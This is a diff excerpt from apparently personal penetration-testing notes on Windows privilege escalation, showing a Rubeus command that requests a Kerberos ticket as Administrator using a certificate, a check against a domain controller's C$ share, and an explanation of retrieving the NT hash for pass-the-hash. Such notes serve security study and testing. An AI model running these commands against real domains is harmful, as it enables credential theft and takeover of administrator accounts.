Print3M/print3m.github.io/_notes/knowledge/windows/privilege-escalation.md

 # Request Kerberos TGT using the received certificate
 Rubeus.exe asktgt /user:Administrator /certificate:<cert.pfx> /password:password /ptt

-# Check if privilege escalation works
+# Check if privilege escalation works (it might not work but look for NT hash)
 dir \\<dc>\C$
 ```

+Requesting TGT using the certificate (with `Rubeus`) should return user's NT hash that can be use to **pass-the-hash** (if PKINIT is enabled).
+It uses so-called user-to-user (u2u) auth - the user authenticates to itself using Kerberos and retrieves its NT hash.

 **NOTE**: Certify.exe returns a `PEM` format certificate.
 It must be converted into the `PFX` format to use it with `Rubeus`: